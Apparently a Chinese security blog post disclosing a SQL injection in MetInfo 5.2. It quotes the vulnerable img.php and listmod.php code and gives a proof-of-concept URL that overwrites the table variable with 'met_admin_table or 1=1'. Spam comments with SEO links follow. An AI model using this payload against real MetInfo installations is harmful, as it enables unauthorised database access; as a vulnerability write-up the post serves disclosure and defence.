metinfo 5.2 case-index.php 注入漏洞利用工具


漏洞文件: img.php
<?php

# MetInfo Enterprise Content Management System

# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights
reserved.

require_once '../include/common.inc.php';

$mdname = 'img';

$showname = 'showimg';

$dbname = $met_img;

$dbname_list = $met_img_list;

$mdmendy = 1;

$imgproduct = 'img';

require_once '../include/global/listmod.php';

$img_listnow = $modlistnow;

$img_list_new  = $md_list_new;

$img_class_new = $md_class_new;

$img_list_com  = $md_list_com;

$img_class_com = $md_class_com;

$img_class     = $md_class;

$img_list      = $md_list;

require_once '../public/php/imghtml.inc.php';

include template('img');

footer();

# This program is an open source system, commercial use, please
consciously to purchase commercial license.

# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights
reserved.

?>
第7行$dbname可以覆盖此变量
http://localhost/case/?settings[met_img]=met_admin_table%20or%201=1 –
来到文件
D:\www\php\MetInfo5.2\include\global\listmod.php

require_once substr(dirname(__FILE__), 0, -6).'common.inc.php';

require_once '../include/global/pseudo.php';

if($dbname!=$met_download&&$dbname!=$met_img&&$dbname!
=$met_news&&$dbname!=$met_product){okinfo('../404.html');exit();}

if($class_list[$class1]['module']>=100||
($class1==0&&$class2==0&&$class3==0)){

    if($search=="search"){

        $search_module=$imgproduct=='product'?3:5;

        $query="select * from $met_column where
module='$search_module' and (classtype=1 or releclass!=0) and
lang='$lang' order by no_order ASC,id ASC";

        $search_coloumn=$db->get_all($query);

        $class1=$search_coloumn[0]['id'];

    }else{
接着进入数据库查询即可导致注入

下载只允许会员下载 该文件只允许会员下载! 登录 | 注册

文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 10 | 引用: 0 | 查看次数: 2674
  • 1
Grazyna [2015-08-20 03:09 AM]
I treasure the data on your internet site.
Much thanks.

Also visit my webpage ... TesettüR MağAzaları
Gwen [2015-08-18 07:41 PM]
Appreciate it for sharing this well put together webpage.


Look into my web-site tesettür indirim
Shawn [2015-08-17 06:07 PM]
Rather enlightening....looking ahead to returning.

Here is my webpage :: Xl Tesettür abiye
Minna [2015-08-16 10:13 AM]
You have the best webpages.

My web-site :: Antalya Halı YıKama
Mike [2015-08-12 04:49 PM]
Good day, neat internet site you have presently.

My web-site ... Jame
Keenan [2015-08-11 03:35 PM]
Really, such a helpful online site.

My site Travis
Halina [2015-08-10 05:27 PM]
Thanks, this site is extremely helpful.

my blog ... Temizlik Firmaları
Janet [2015-08-10 09:35 AM]
Awesome internet site you have right here.

Visit my site - antalya halı yıkama
Wendi [2015-08-09 03:37 PM]
Great internet site! It looks very good! Maintain the good work!


Stop by my web blog ... Antalyada Masaj Salonlari
Annetta [2015-08-05 07:31 AM]
You've got possibly the best sites.

Here is my webpage kusadasi escort
  • 1
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭